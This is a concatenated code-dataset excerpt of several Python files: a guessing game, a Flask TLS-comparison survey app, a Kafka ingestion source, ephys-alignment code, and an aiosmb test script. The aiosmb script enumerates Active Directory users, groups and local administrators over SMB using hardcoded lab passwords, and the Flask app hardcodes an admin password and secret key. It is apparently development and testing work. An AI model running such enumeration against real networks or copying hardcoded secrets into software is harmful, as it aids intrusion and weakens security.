b[d[red1.id]] += to_number(match.scorefield_set.get(name=component, color='red').value)\n\n try:\n oprs = np.linalg.solve(a, b)\n coprs.update({component: {t: oprs[i] for t, i in d.items()}})\n except np.linalg.LinAlgError as e:\n print(f'Unable to solve for component opr for component \"{component}\"')\n coprs.update({component: {}})\n\n return coprs\n","sub_path":"util/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183923782","text":"# problem: https://www.practicepython.org/exercise/2015/11/01/25-guessing-game-two.html\nimport math\n\n\ndef round_half_up(n, decimals=0):\n multiplier = 10 ** decimals\n return math.floor(n * multiplier + 0.5) / multiplier\n\n\nprint(\"Think about a number between 0 and 100.\")\nnumber = 50\nstep = 2\n\nrun = True\nwhile run:\n attempt = input(\"Did you think about {}? Write [too low, too high or yes]: \".format(int(number)))\n step *= 2\n\n if attempt == \"too low\":\n number += round_half_up(100 / step)\n elif attempt == \"too high\":\n number -= round_half_up(100 / step)\n elif attempt == \"yes\":\n print(\"Thanks for game!\")\n run = False\n else:\n run = False\n","sub_path":"guessing-game-two.py","file_name":"guessing-game-two.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438905372","text":"# coding=utf-8\n__author__ = 'willi'\n\nfrom flask import Flask, render_template, request, jsonify, session, abort, flash\nfrom flask.ext.basicauth import BasicAuth\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.sql.expression import func, between, or_\nfrom database import Comparison, Result\nfrom datetime import datetime, timedelta, date\nimport random\nimport string\n\n########################################################################################################################\n# Config\n########################################################################################################################\n\napp = Flask(__name__)\napp.config['DEBUG'] = False\napp.config['DATABASE_URL'] = 'sqlite:///database/tlscompare.db'\n\n# Used a flask extension for basic auth\n# https://flask-basicauth.readthedocs.org/en/latest/\napp.config['BASIC_AUTH_USERNAME'] = 'superadmin'\napp.config['BASIC_AUTH_PASSWORD'] = 'this-is-the-best-password-evar'\nbasic_auth = BasicAuth(app)\n\napp.config['DATASETS'] = ['generated-around-threshold',\n 'generated-valid-top10k',\n 'existing',\n 'pets-ws15']\napp.config['DATASET_DEFAULT'] = 'generated-valid-top10k'\n\napp.config['NEG_REASONS'] = ['mixed-content',\n 'certificate-mismatch',\n 'timeout',\n 'untrusted-certificate',\n 'no-sense']\napp.config['POS_REASONS'] = ['mixed-content',\n 'sense']\n\n# This secret key is for encrypting the cookies\napp.secret_key = 'here-should-be-a-secret-key-for-cookie-encryption'\n\n########################################################################################################################\n# Web Code\n########################################################################################################################\n\ndbsession = None\n\n\n@app.route('/')\ndef index():\n \"\"\"\n The default comparison page\n \"\"\"\n check_datset()\n check_uid()\n\n # Get new random comparison\n return render_template('comparison.html', counter=get_result_count_for_uid(session['id']))\n\n\n@app.route('/expert')\ndef expert():\n \"\"\"\n Expert page, same as comparison, but expert.html\n \"\"\"\n check_datset()\n check_uid()\n\n # Get new random comparison\n return render_template('expert.html', counter=get_result_count_for_uid(session['id']))\n\n\n@app.route('/invalid/', methods=['GET'])\ndef invalid(req_id):\n \"\"\"\n Mark a rule as invalid\n reason checked\n req_id checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n if 'id' not in session or session['id'] == \"\":\n abort(403)\n else:\n reason = request.args.get('reason', None)\n\n if reason is not None and reason not in app.config['NEG_REASONS']:\n abort(403)\n ret = save_result(session['id'], req_id, False, reason=reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n@app.route('/valid/', methods=['GET'])\ndef valid(req_id):\n \"\"\"\n Mark a rule as valid\n req_id checked\n reason checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n if 'id' not in session or session['id'] == \"\":\n abort(403)\n else:\n reason = request.args.get('reason', None)\n if reason is not None and reason not in app.config['POS_REASONS']:\n abort(403)\n ret = save_result(session['id'], req_id, True, reason=reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n@app.route('/overview')\ndef overview():\n \"\"\"\n Statistics\n \"\"\"\n check_datset()\n check_uid()\n\n return render_template('overview.html',\n hours_wasted=get_hours_wasted(),\n hourly_stats=get_results_hourly(),\n daily_stats=get_results_daily(),\n nr_results_id=get_result_count_for_uid(session['id']),\n nr_results_ip=get_result_count_for_ip(request.remote_addr),\n nr_comparisons=dbsession.query(Comparison).count(),\n nr_results=dbsession.query(Result).count(),\n # false_pos=get_false_pos_query().count(),\n # false_neg=get_false_neg_query().count(),\n nr_current_dataset=get_dataset(session['dataset']).count(),\n dataset=session['dataset'])\n\n\n@app.route('/comparison')\ndef get_random_comparison_json():\n\n check_uid()\n check_datset()\n\n query = dbsession.query(Comparison, func.count(Result.id).label('c'))\n subquery = filter_dataset(query, session['dataset']).outerjoin(Result).group_by(Comparison.id).subquery()\n min_results = dbsession.query(func.min(subquery.c.c)).scalar()\n comp = get_dataset(session['dataset']).outerjoin(Result).group_by(Comparison.id).having(func.count(Result.id) == min_results).order_by(func.random()).first()\n\n req_id = generate_request(session['id'], comp.id)\n\n return jsonify({'http_url': comp.http_url, 'https_url': comp.https_url, 'rid': req_id})\n\n\n@app.route('/dataset/', methods=['GET'])\ndef set_dataset(dataset_id):\n \"\"\"\n Change a dataset in the session\n dataset_id checked\n \"\"\"\n if dataset_id in app.config['DATASETS']:\n session['dataset'] = dataset_id\n return dataset_id\n else:\n abort(403)\n\n@app.route('/student/', methods=['GET'])\ndef set_student(matnr):\n \"\"\"\n Set the matnr to the session\n This is only allowed once per session -> Otherwise the student has to close the browser and do it again\n It takes matnr up to 16 chars -> we could use other ids instead of matnr\n Then set the dataset to pets-ws15\n matnr overwrites other dataset settings, see check_datset()\n the filter of pets-ws15 is defined in filter_dataset()\n \"\"\"\n\n check_uid()\n\n if 'matnr' not in session or session['matnr'] == \"\":\n session['matnr'] = matnr[:16]\n\n session['dataset'] = 'pets-ws15'\n\n return render_template('expert.html', counter=get_result_count_for_uid(session['id']))\n\n@app.route('/student/logout')\ndef logout():\n session.clear()\n return index()\n\n@app.route('/contact')\ndef contact():\n return render_template('contact.html')\n\n\n@app.route('/faq')\ndef faq():\n return render_template('faq.html')\n\n\n@app.route('/admin')\n@basic_auth.required\ndef admin():\n return render_template('admin.html')\n\n\n@app.route('/results', defaults={'cid': None})\n@app.route('/results/')\n@basic_auth.required\ndef results(cid):\n\n try:\n if cid is not None:\n int(cid)\n except ValueError:\n abort(403)\n\n page = int(request.args.get('page', 0))\n q = dbsession.query(Result).join(Comparison)\n\n comparison = False\n if cid:\n q = q.filter(Result.comparison_id == cid)\n comparison = True\n\n count = q.count()\n q = q.limit(100).offset(100*page)\n\n return render_template('results.html',\n stats=q.all(),\n comparison=comparison,\n pos_reasons=app.config['POS_REASONS'],\n neg_reasons=app.config['NEG_REASONS'],\n count=count,\n page=page)\n\n\n# @app.route('/results/false_pos')\n# @basic_auth.required\n# def results_false_pos():\n# return render_template('results.html',\n# stats=get_false_pos_query().all(),\n# comparison=False,\n# pos_reasons=app.config['POS_REASONS'],\n# neg_reasons=app.config['NEG_REASONS'])\n#\n#\n# @app.route('/results/false_neg')\n# @basic_auth.required\n# def results_false_neg():\n# return render_template('results.html',\n# stats=get_false_neg_query().all(),\n# comparison=False,\n# pos_reasons=app.config['POS_REASONS'],\n# neg_reasons=app.config['NEG_REASONS'])\n\n\n@app.route('/change_reason/', methods=['GET'])\n@basic_auth.required\ndef change_reason(req_id):\n \"\"\"\n Change a reason afterwards (from results page)\n req_id checked\n reason checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n reason = request.args.get('reason', None)\n if reason is not None and reason not in app.config['NEG_REASONS'] and reason not in app.config['POS_REASONS']:\n abort(403)\n\n ret = change_reason_result(req_id, reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n########################################################################################################################\n# Helper (DB and so on)\n########################################################################################################################\n\n\n# def get_false_pos_query():\n# return dbsession.query(Result).join(Comparison) \\\n# .filter(Result.validity.is_(False)) \\\n# .filter(Comparison.similarityvalue1 > THRESHOLD_SIMILARITYVALUE1) \\\n# .filter(Comparison.similarityvalue2 > THRESHOLD_SIMILARITYVALUE2)\n#\n#\n# def get_false_neg_query():\n# return dbsession.query(Result).join(Comparison)\\\n# .filter(Result.validity.is_(True))\\\n# .filter(Comparison.similarityvalue1 <= THRESHOLD_SIMILARITYVALUE1)\\\n# .filter(Comparison.similarityvalue2 <= THRESHOLD_SIMILARITYVALUE2)\n\n@app.route('/dataset_stats')\n@basic_auth.required\ndef dataset_stats():\n\n datasets = []\n\n for dataset in app.config['DATASETS']:\n\n query = dbsession.query(Comparison, func.count(Result.id).label('c'))\n subquery = filter_dataset(query, dataset).outerjoin(Result).group_by(Comparison.id).subquery()\n nr_results = dbsession.query(subquery.c.c, func.count('*')).group_by(subquery.c.c).all()\n\n datasets.append({'name': dataset,\n 'nr_comparisons': get_dataset(dataset).count(),\n 'nr_results': nr_results})\n\n return render_template('datasetstat.html',\n datasets=datasets)\n\n\ndef generate_request(uid, cid):\n r = Result(uid=uid,\n comparison_id=cid,\n req_time=datetime.now(),\n ip=request.remote_addr,\n useragent=str(request.user_agent))\n\n if 'matnr' in session:\n r.matnr = session['matnr']\n\n dbsession.add(r)\n dbsession.commit()\n return r.id\n\n\ndef save_result(uid, request_id, validity, reason=None):\n r = dbsession.query(Result).filter_by(id=request_id).first()\n if r is None:\n return False\n else:\n if r.validity is not None or \\\n r.uid != uid or \\\n r.ip != request.remote_addr or \\\n r.useragent != str(request.user_agent):\n return False\n if 'matnr' in session and r.matnr != session['matnr'] or \\\n 'matnr' not in session and r.matnr is not None:\n return False\n\n r.res_time = datetime.now()\n r.validity = validity\n\n if r.validity is True and reason is not None and reason not in app.config['POS_REASONS']:\n return False\n elif r.validity is False and reason is not None and reason not in app.config['NEG_REASONS']:\n return False\n\n r.reason = reason\n\n dbsession.commit()\n return True\n\n\ndef change_reason_result(request_id, reason):\n r = dbsession.query(Result).filter_by(id=request_id).first()\n\n if r.validity is True and reason is not None and reason not in app.config['POS_REASONS']:\n return False\n elif r.validity is False and reason is not None and reason not in app.config['NEG_REASONS']:\n return False\n\n r.reason = reason\n r.reason_changed = True\n\n dbsession.commit()\n return True\n\n\ndef get_result_count_for_uid(uid):\n \"\"\"\n Return the current results on the start page\n if matnr is set in session, use this\n :param uid:\n :return:\n \"\"\"\n if 'matnr' in session:\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.matnr == session['matnr']).count()\n else:\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.uid == uid).count()\n\n\ndef get_result_count_for_ip(ip):\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.ip == ip).count()\n\n\ndef get_results_daily():\n values = dbsession.query(func.date(Result.res_time).label('date'), func.count(\"*\").label('count'))\\\n .filter(Result.validity.isnot(None))\\\n .filter(Result.res_time > (date.today()-timedelta(days=30)))\\\n .group_by('date').all()\n return values\n\n\ndef get_results_hourly():\n values = dbsession.query(func.strftime('%H', Result.res_time).label('date'), func.count(\"*\").label('count'))\\\n .filter(Result.validity.isnot(None))\\\n .group_by('date').all()\n\n d = {n: 0 for n in range(24)}\n for hour, count in values:\n d[int(hour)] = count\n return d\n\n\ndef get_hours_wasted():\n return round(dbsession.query(func.sum(func.strftime('%s', Result.res_time)-func.strftime('%s', Result.req_time)))\n .filter(Result.validity.isnot(None)).first()[0]/3600.0, 3)\n\n\ndef check_uid():\n if 'id' not in session or session['id'] == \"\":\n session['id'] = get_random_id()\n\n########################################################################################################################\n# Datasets\n########################################################################################################################\n\nTHRESHOLD_SIMILARITYVALUE1 = 0.49\nTHRESHOLD_SIMILARITYVALUE2 = 0.68\n\n\ndef check_datset():\n if 'matnr' in session:\n session['dataset'] = 'pets-ws15'\n if 'dataset' not in session:\n session['dataset'] = app.config['DATASET_DEFAULT']\n\n\ndef get_dataset(dataset):\n return filter_dataset(dbsession.query(Comparison), dataset)\n\n\ndef filter_dataset(query, dataset):\n # Only https everywhere\n if dataset == \"existing\":\n return query.filter(Comparison.code == \"H\").order_by(func.random())\n # around-threshold\n # where similarityvalue1 BETWEEN 0.39 and 0.59\n # or similarityvalue2 BETWEEN 0.58 and 0.77\n # and ruleset of dominik\n elif dataset == \"generated-around-threshold\":\n return query.filter(Comparison.code == \"D\") \\\n .filter(or_(between(Comparison.similarityvalue1,\n THRESHOLD_SIMILARITYVALUE1 - 0.1,\n THRESHOLD_SIMILARITYVALUE1 + 0.1),\n between(Comparison.similarityvalue2,\n THRESHOLD_SIMILARITYVALUE2 - 0.1,\n THRESHOLD_SIMILARITYVALUE2 + 0.1))) \\\n .filter(Comparison.http_url.like('http://%/')) \\\n .filter(Comparison.https_url.like('https://%/')) \\\n .order_by(func.random())\n elif dataset == \"generated-valid-top10k\":\n return query.filter(Comparison.code == \"D\") \\\n .filter(Comparison.similarityvalue1 >= 0.95) \\\n .filter(Comparison.similarityvalue2 >= 0.95) \\\n .filter(Comparison.http_url.like('http://%/')) \\\n .filter(Comparison.https_url.like('https://%/')) \\\n .filter(Comparison.rank < 48890) \\\n .order_by(func.random())\n # Pure Random\n elif dataset == \"pets-ws15\":\n return query.filter(Comparison.code == \"PETS-WS15\").order_by(func.random())\n else:\n return query.order_by(func.random())\n\n\ndef get_random_id():\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))\n\n\n@app.before_request\ndef create_session():\n global dbsession\n if dbsession is None:\n engine = create_engine(app.config['DATABASE_URL'])\n dbsession = scoped_session(sessionmaker(bind=engine))\n\n\n@app.teardown_appcontext\ndef shutdown_session(_=None):\n global dbsession\n if dbsession is not None:\n dbsession.remove()\n dbsession = None\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tlscompare.py","file_name":"tlscompare.py","file_ext":"py","file_size_in_byte":16336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99466395","text":"# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# This import verifies that the dependencies are available.\n\nimport concurrent.futures\nfrom dataclasses import Field, dataclass, field\nfrom typing import Iterable, List, Optional\n\nimport confluent_kafka\nfrom confluent_kafka.admin import AdminClient, ConfigResource\nfrom confluent_kafka.schema_registry.schema_registry_client import (\n Schema,\n SchemaRegistryClient,\n)\n\nfrom metadata.config.common import ConfigModel\nfrom metadata.generated.schema.api.data.createTopic import CreateTopicEntityRequest\nfrom metadata.generated.schema.entity.data.topic import SchemaType, Topic\nfrom metadata.generated.schema.entity.services.messagingService import (\n MessagingServiceType,\n)\nfrom metadata.generated.schema.type.entityReference import EntityReference\nfrom metadata.ingestion.api.common import (\n IncludeFilterPattern,\n Record,\n WorkflowContext,\n logger,\n)\nfrom metadata.ingestion.api.source import Source, SourceStatus\nfrom metadata.ingestion.ometa.openmetadata_rest import MetadataServerConfig\nfrom metadata.utils.helpers import get_messaging_service_or_create\n\n\n@dataclass\nclass KafkaSourceStatus(SourceStatus):\n topics_scanned: List[str] = field(default_factory=list)\n filtered: List[str] = field(default_factory=list)\n\n def topic_scanned(self, topic: str) -> None:\n self.topics_scanned.append(topic)\n\n def dropped(self, topic: str) -> None:\n self.filtered.append(topic)\n\n\nclass KafkaSourceConfig(ConfigModel):\n bootstrap_servers: str = \"localhost:9092\"\n schema_registry_url: str = \"http://localhost:8081\"\n consumer_config: dict = {}\n service_name: str\n service_type: str = \"Kafka\"\n filter_pattern: IncludeFilterPattern = IncludeFilterPattern.allow_all()\n\n\n@dataclass\nclass KafkaSource(Source):\n config: KafkaSourceConfig\n admin_client: AdminClient\n report: KafkaSourceStatus\n\n def __init__(\n self,\n config: KafkaSourceConfig,\n metadata_config: MetadataServerConfig,\n ctx: WorkflowContext,\n ):\n super().__init__(ctx)\n self.config = config\n self.metadata_config = metadata_config\n self.status = KafkaSourceStatus()\n self.service = get_messaging_service_or_create(\n config.service_name,\n MessagingServiceType.Kafka.name,\n config.schema_registry_url,\n config.bootstrap_servers.split(\",\"),\n metadata_config,\n )\n self.schema_registry_client = SchemaRegistryClient(\n {\"url\": self.config.schema_registry_url}\n )\n self.admin_client = AdminClient(\n {\n \"bootstrap.servers\": self.config.bootstrap_servers,\n \"session.timeout.ms\": 6000,\n }\n )\n\n @classmethod\n def create(cls, config_dict, metadata_config_dict, ctx):\n config = KafkaSourceConfig.parse_obj(config_dict)\n metadata_config = MetadataServerConfig.parse_obj(metadata_config_dict)\n return cls(config, metadata_config, ctx)\n\n def prepare(self):\n pass\n\n def next_record(self) -> Iterable[CreateTopicEntityRequest]:\n topics = self.admin_client.list_topics().topics\n for t in topics:\n if self.config.filter_pattern.included(t):\n logger.info(\"Fetching topic schema {}\".format(t))\n topic_schema = self._parse_topic_metadata(t)\n topic = CreateTopicEntityRequest(\n name=t,\n service=EntityReference(\n id=self.service.id, type=\"messagingService\"\n ),\n partitions=1,\n )\n if topic_schema is not None:\n topic.schemaText = topic_schema.schema_str\n if topic_schema.schema_type == \"AVRO\":\n topic.schemaType = SchemaType.Avro.name\n elif topic_schema.schema_type == \"PROTOBUF\":\n topic.schemaType = SchemaType.Protobuf.name\n elif topic_schema.schema_type == \"JSON\":\n topic.schemaType = SchemaType.JSON.name\n else:\n topic.schemaType = SchemaType.Other.name\n\n self.status.topic_scanned(topic.name.__root__)\n yield topic\n else:\n self.status.dropped(t)\n\n def _parse_topic_metadata(self, topic: str) -> Optional[Schema]:\n logger.debug(f\"topic = {topic}\")\n schema: Optional[Schema] = None\n try:\n registered_schema = self.schema_registry_client.get_latest_version(\n topic + \"-value\"\n )\n schema = registered_schema.schema\n except Exception as e:\n self.status.warning(topic, f\"failed to get schema: {e} for topic {topic}\")\n\n return schema\n\n def get_status(self):\n return self.status\n\n def close(self):\n pass\n","sub_path":"ingestion/src/metadata/ingestion/source/kafka.py","file_name":"kafka.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"332021069","text":"import asyncio\n\nimport enum\nimport os\n\nfrom aiosmb.commons.smbcredential import SMBCredential\nfrom aiosmb.commons.smbtarget import SMBTarget\nfrom aiosmb.smbconnection import SMBConnection\nfrom aiosmb.filereader import SMBFileReader\nfrom aiosmb.commons.authenticator_builder import AuthenticatorBuilder\nfrom aiosmb.dcerpc.v5.transport.smbtransport import SMBTransport\nfrom aiosmb.dcerpc.v5.interfaces.samrmgr import SMBSAMR\n\t\t\n\t\n\n\t\t\n\nasync def filereader_test(connection_string, filename):\n\ttarget = SMBTarget.from_connection_string(connection_string)\n\tcredential = SMBCredential.from_connection_string(connection_string)\n\t\n\tspneg = AuthenticatorBuilder.to_spnego_cred(credential, target)\n\t\n\tasync with SMBConnection(spneg, target) as connection: \n\t\tawait connection.login()\n\t\t\n\t\tsamr = SMBSAMR(connection)\n\t\tawait samr.connect()\n\t\tasync for domain in samr.list_domains():\n\t\t\tprint('domain: %s' % domain)\n\t\tdomain_sid = await samr.get_domain_sid('TEST')\n\t\tprint(str(domain_sid))\n\t\tdomain_handle = await samr.open_domain(domain_sid)\n\t\tprint(domain_handle)\n\t\tasync for username in samr.list_domain_users(domain_handle):\n\t\t\tprint(username)\n\t\t\t\n\t\tasync for groupname in samr.list_domain_groups(domain_handle):\n\t\t\tprint(groupname)\n\t\t\t\n\t\t\t\n\t\tasync for sid, username in samr.enumerate_users(domain_handle):\n\t\t\tprint(username, sid)\n\t\t\t\n\t\t\t\n\t\tuser_handle = await samr.open_user(domain_handle, 1106)\n\t\tinput(user_handle)\n\t\tasync for sid in samr.get_user_group_memberships(user_handle):\n\t\t\tprint(sid)\n\t\t\n\t\t#polling local goup users\n\t\tlocal_domain_sid = await samr.get_domain_sid('Builtin')\n\t\tdomain_handle = await samr.open_domain(local_domain_sid)\n\t\talias_handle = await samr.open_alias(domain_handle, 544)\n\t\tasync for sid in samr.list_alias_members(alias_handle):\n\t\t\tprint(sid)\n\t\t\n\t\nif __name__ == '__main__':\n\tconnection_string = 'TEST/victim/ntlm/password:Passw0rd!1@10.10.10.2'\t\n\t#connection_string = 'TEST/Administrator/ntlm/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST/Administrator/sspi-ntlm/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST/Administrator/kerberos/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST.corp/Administrator/sspi-kerberos@win2019ad.test.corp/10.10.10.2'\n\tfilename = '\\\\\\\\10.10.10.2\\\\Users\\\\Administrator\\\\Desktop\\\\smb_test\\\\testfile1.txt'\n\t\n\t\n\tasyncio.run(filereader_test(connection_string, filename))\n\t\n\t\n\t'TODO: TEST NT hash with ntlm!'","sub_path":"devel/test_rpc_samr.py","file_name":"test_rpc_samr.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652199670","text":"import scipy\r\nimport numpy as np\r\nimport ibllib.pipes.histology as histology\r\nimport ibllib.atlas as atlas\r\n\r\nbrain_atlas = atlas.AllenAtlas(25)\r\nTIP_SIZE_UM = 200\r\n\r\n\r\ndef _cumulative_distance(xyz):\r\n return np.cumsum(np.r_[0, np.sqrt(np.sum(np.diff(xyz, axis=0) ** 2, axis=1))])\r\n\r\n\r\nclass EphysAlignment:\r\n\r\n def __init__(self, xyz_picks, chn_depths=None, track_prev=None,\r\n feature_prev=None):\r\n\r\n self.xyz_track, self.track_extent = self.get_insertion_track(xyz_picks)\r\n self.chn_depths = chn_depths\r\n if np.any(track_prev):\r\n self.track_init = track_prev\r\n self.feature_init = feature_prev\r\n else:\r\n self.track_init = np.copy(self.track_extent)\r\n self.feature_init = np.copy(self.track_extent)\r\n\r\n sampling_trk = np.arange(self.track_extent[0],\r\n self.track_extent[-1] - 10 * 1e-6, 10 * 1e-6)\r\n self.xyz_samples = histology.interpolate_along_track(self.xyz_track,\r\n sampling_trk - sampling_trk[0])\r\n\r\n self.region, self.region_label, self.region_colour, self.region_id\\\r\n = self.get_histology_regions(self.xyz_samples, sampling_trk)\r\n\r\n def get_insertion_track(self, xyz_picks):\r\n \"\"\"\r\n Extends probe trajectory from bottom of brain to upper bound of allen atlas\r\n :param xyz_picks: points defining probe trajectory in 3D space (xyz)\r\n :type xyz_picks: np.array((n, 3)) - n: no. of unique points\r\n :return xyz_track: points defining extended trajectory in 3D space (xyz)\r\n :type xyz_track: np.array((n+2, 3))\r\n :return track_extent: cumulative distance between two extremes of xyz_track (bottom of\r\n brain and top of atlas) offset by distance to probe tip\r\n :type track_extent: np.array((2))\r\n \"\"\"\r\n # Use the first and last quarter of xyz_picks to estimate the trajectory beyond xyz_picks\r\n n_picks = np.max([4, round(xyz_picks.shape[0] / 4)])\r\n traj_entry = atlas.Trajectory.fit(xyz_picks[:n_picks, :])\r\n traj_exit = atlas.Trajectory.fit(xyz_picks[-1 * n_picks:, :])\r\n # Force the entry to be on the upper z lim of the atlas to account for cases where channels\r\n # may be located above the surface of the brain\r\n entry = (traj_entry.eval_z(brain_atlas.bc.zlim))[0, :]\r\n # The exit is just below the bottom surfacce of the brain\r\n exit = atlas.Insertion.get_brain_exit(traj_exit, brain_atlas)\r\n exit[2] = exit[2] - 200 / 1e6\r\n\r\n xyz_track = np.r_[exit[np.newaxis, :], xyz_picks, entry[np.newaxis, :]]\r\n # Sort so that most ventral coordinate is first\r\n xyz_track = xyz_track[np.argsort(xyz_track[:, 2]), :]\r\n\r\n # Compute distance to first electrode from bottom coordinate\r\n tip_distance = _cumulative_distance(xyz_track)[1] + TIP_SIZE_UM / 1e6\r\n track_length = _cumulative_distance(xyz_track)[-1]\r\n track_extent = np.array([0, track_length]) - tip_distance\r\n\r\n return xyz_track, track_extent\r\n\r\n def get_track_and_feature(self):\r\n \"\"\"\r\n Return track, feature and xyz_track variables\r\n \"\"\"\r\n return self.feature_init, self.track_init, self.xyz_track\r\n\r\n @staticmethod\r\n def feature2track(trk, feature, track):\r\n \"\"\"\r\n Estimate new values of trk according to interpolated fit between feature and track space\r\n :param trk: points in track space to convert feature space\r\n :type trk: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(trk): interpolated values of trk\r\n :type fcn(trk): np.array\r\n \"\"\"\r\n\r\n fcn = scipy.interpolate.interp1d(feature, track, fill_value=\"extrapolate\")\r\n return fcn(trk)\r\n\r\n @staticmethod\r\n def track2feature(ft, feature, track):\r\n \"\"\"\r\n Estimate new values of ft according to interpolated fit between track and feature space\r\n :param ft: points in feature space to convert track space\r\n :type ft: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(ft): interpolated values of ft\r\n :type fcn(ft): np.array\r\n \"\"\"\r\n fcn = scipy.interpolate.interp1d(track, feature, fill_value=\"extrapolate\")\r\n return fcn(ft)\r\n\r\n @staticmethod\r\n def feature2track_lin(trk, feature, track):\r\n \"\"\"\r\n Estimate new values of trk according to linear fit between feature and track space, only\r\n implemented if no. of reference points >= 3\r\n :param trk: points in track space to convert feature space\r\n :type trk: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(trk): linear fit values of trk\r\n :type fcn(trk): np.array\r\n \"\"\"\r\n if feature.size >= 5:\r\n fcn_lin = np.poly1d(np.polyfit(feature[1:-1], track[1:-1], 1))\r\n lin_fit = fcn_lin(trk)\r\n else:\r\n lin_fit = 0\r\n return lin_fit\r\n\r\n @staticmethod\r\n def adjust_extremes_uniform(feature, track):\r\n \"\"\"\r\n Change the value of the first and last reference points (non user chosen points) such\r\n that coordinates outside user picked regions are left unchanged\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return track: reference coordinates in track space with first and last value adjusted\r\n :type track: np.array((n_lines + 2))\r\n \"\"\"\r\n diff = np.diff(feature - track)\r\n track[0] -= diff[0]\r\n track[-1] += diff[-1]\r\n return track\r\n\r\n def adjust_extremes_linear(self, feature, track, extend_feature=1):\r\n \"\"\"\r\n Change the value of the first and last reference points (non user chosen points) such\r\n that coordinates outside user picked regions have a linear fit applied\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :param extend_feature: amount to extend extreme coordinates before applying linear fit\r\n :type extend_feature: float\r\n :return feature: reference coordinates in feature space with first and last value adjusted\r\n :type feature: np.array((n_lines + 2))\r\n :return track: reference coordinates in track space with first and last value adjusted\r\n :type track: np.array((n_lines + 2))\r\n \"\"\"\r\n feature[0] = self.track_extent[0] - extend_feature\r\n feature[-1] = self.track_extent[-1] + extend_feature\r\n extend_track = self.feature2track_lin(feature[[0, -1]], feature, track)\r\n track[0] = extend_track[0]\r\n track[-1] = extend_track[-1]\r\n return feature, track\r\n\r\n def scale_histology_regions(self, feature, track):\r\n \"\"\"\r\n Recompute locations of brain region boundaries using interpolated fit based on reference\r\n lines\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return region: new coordinates of histology boundaries after applying interpolation\r\n :type region: np.array((n_bound, 2)) n_bound: no. of histology boundaries\r\n :return region_label: new coordinates of histology labels positions after applying\r\n interpolation\r\n :type region_label: np.array((n_bound)) of tuples (coordinate - float, label - str)\r\n \"\"\"\r\n region_label = np.copy(self.region_label)\r\n region = self.track2feature(self.region, feature, track) * 1e6\r\n region_label[:, 0] = (self.track2feature(np.float64(region_label[:, 0]), feature,\r\n track) * 1e6)\r\n return region, region_label\r\n\r\n @staticmethod\r\n def get_histology_regions(xyz_coords, depth_coords):\r\n \"\"\"\r\n Find all brain regions and their boundaries along the depth of probe or track\r\n :param xyz_coords: 3D coordinates of points along probe or track\r\n :type xyz_coords: np.array((n_points, 3)) n_points: no. of points\r\n :param depth_coords: depth along probe or track where each xyz_coord is located\r\n :type depth_coords: np.array((n_points))\r\n :return region: coordinates bounding each brain region\r\n :type region: np.array((n_bound, 2)) n_bound: no. of histology boundaries\r\n :return region_label: label for each brain region and coordinate of where to place label\r\n :type region_label: np.array((n_bound)) of tuples (coordinate - float, label - str)\r\n :return region_colour: allen atlas rgb colour for each brain region along track\r\n :type region_colour: np.array((n_bound, 3))\r\n :return region_id: allen atlas id for each brain region along track\r\n :type region_id: np.array((n_bound))\r\n 